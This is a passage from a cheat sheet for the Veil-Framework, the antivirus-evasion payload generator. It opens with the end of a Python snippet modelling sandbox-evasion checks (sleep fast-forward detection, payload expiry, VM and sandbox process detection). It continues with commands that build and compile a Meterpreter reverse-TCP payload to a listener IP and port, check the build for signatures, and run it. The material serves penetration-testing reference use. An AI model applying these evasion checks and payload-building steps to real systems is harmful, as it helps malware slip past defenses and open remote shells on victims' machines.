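    if is_set("SLEEP") and host.sleep_elapsed < float(opts["SLEEP"]):
        failed.append("SLEEP")                              # sandbox fast-forwarded the sleep
    if is_set("EXPIRE_PAYLOAD") and (host.today - built).days > int(opts["EXPIRE_PAYLOAD"]):
        failed.append("EXPIRE_PAYLOAD")
    procs = {p.lower() for p in host.processes}
    if is_set("VIRTUALPROC") and procs & VM_PROCESSES:
        failed.append("VIRTUALPROC")
    if is_set("SANDBOXPROCESS") and procs & SANDBOX_PROCESSES:
        failed.append("SANDBOXPROCESS")
    return failed


def should_run(host: HostProfile, opts: dict[str, str], built: date) -> bool:
    return not failed_checks(host, opts, built)


# Constructed sample profiles.
SANDBOX = HostProfile("WIN-ABC123", "WORKGROUP", "admin", 1, 2.0,
                      ("vmtoolsd.exe", "explorer.exe"), date(2024, 5, 1), 3.0)
WORKSTATION = HostProfile("WS01", "corp.local", "jdoe", 4, 16.0,
                          ("explorer.exe", "outlook.exe"), date(2024, 5, 1), 30.2)
OPTS = {"SLEEP": "30", "PROCESSORS": "2", "MINRAM": "TRUE",
        "DOMAIN": "corp.local", "VIRTUALPROC": "TRUE"}

if __name__ == "__main__":
    built = date(2024, 4, 30)
    print("sandbox fails:", failed_checks(SANDBOX, OPTS, built))
    print("workstation runs:", should_run(WORKSTATION, OPTS, built))
```

The SLEEP check is the one most worth understanding: the payload does not merely wait, it compares the wall-clock time that elapsed with the time it asked for, so a sandbox that hooks the sleep call to skip ahead fails the check even though the sleep "returned".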
## Troubleshooting
### Common issues
#### Installation problems
```bash
# Fix missing dependencies
sudo apt update
sudo apt install -y python3-dev python3-pip
pip3 install --upgrade pip
# Fix Wine issues (Veil builds Python payloads with a Windows Python/pyinstaller under 32-bit Wine)
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install wine32
# Fix MinGW issues
sudo apt install mingw-w64-i686-dev mingw-w64-x86-64-dev
# Re-run setup
cd Veil
sudo ./config/setup.sh --force
```
#### Compilation errors
```bash
# Check compiler availability
which i686-w64-mingw32-gcc
which x86_64-w64-mingw32-gcc
# Fix C# compilation
sudo apt install mono-mcs mono-complete
# Fix Go compilation (paths as set up by config/setup.sh; adjust to your install)
export GOPATH=/usr/share/veil/go
export PATH=$PATH:/usr/local/go/bin
# Isolate a compiler problem: generate the source only, then compile it by hand
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 -o payload -c COMPILE_TO_EXE=N
mcs /var/lib/veil/output/source/payload.cs
```
#### Payload issues
```bash
# Confirm the payload name exists
./Veil.py -t Evasion --list-payloads | grep meterpreter
# Check a payload's options: in the interactive menu, `use cs/meterpreter/rev_tcp` then `options`
./Veil.py -t Evasion
# Verify output
file /var/lib/veil/output/compiled/payload.exe
strings /var/lib/veil/output/compiled/payload.exe | grep -i meterpreter   # a hit here is an easy signature
# Test payload execution (pyinstaller builds run under Wine; C# builds need mono on Linux)
wine /var/lib/veil/output/compiled/payload.exe
```
#### Debugging
```bash
# Veil has no --debug or --verbose switch: run the same payload from the interactive
# menu, where the compiler output is printed, and inspect the generated source
./Veil.py -t Evasion
# Inspect the generated source and the handler script Veil wrote for it
cat /var/lib/veil/output/source/payload.cs
cat /var/lib/veil/output/handlers/payload.rc
# Start over with clean output folders
./Veil.py --clean
```
## Resources
- [Official Veil-Framework site](LINK_7)
- [Veil documentation](LINK_7)
- [Veil-Framework on GitHub](LINK_7)
- [Antivirus evasion techniques](LINK_7)
- Payload generation best practices
- [Windows PE format](LINK_7)
- [Code obfuscation techniques](LINK_7)
*This cheat sheet is a reference for using Veil for payload generation and antivirus evasion. Always make sure you have proper authorization before using this tool in any environment.*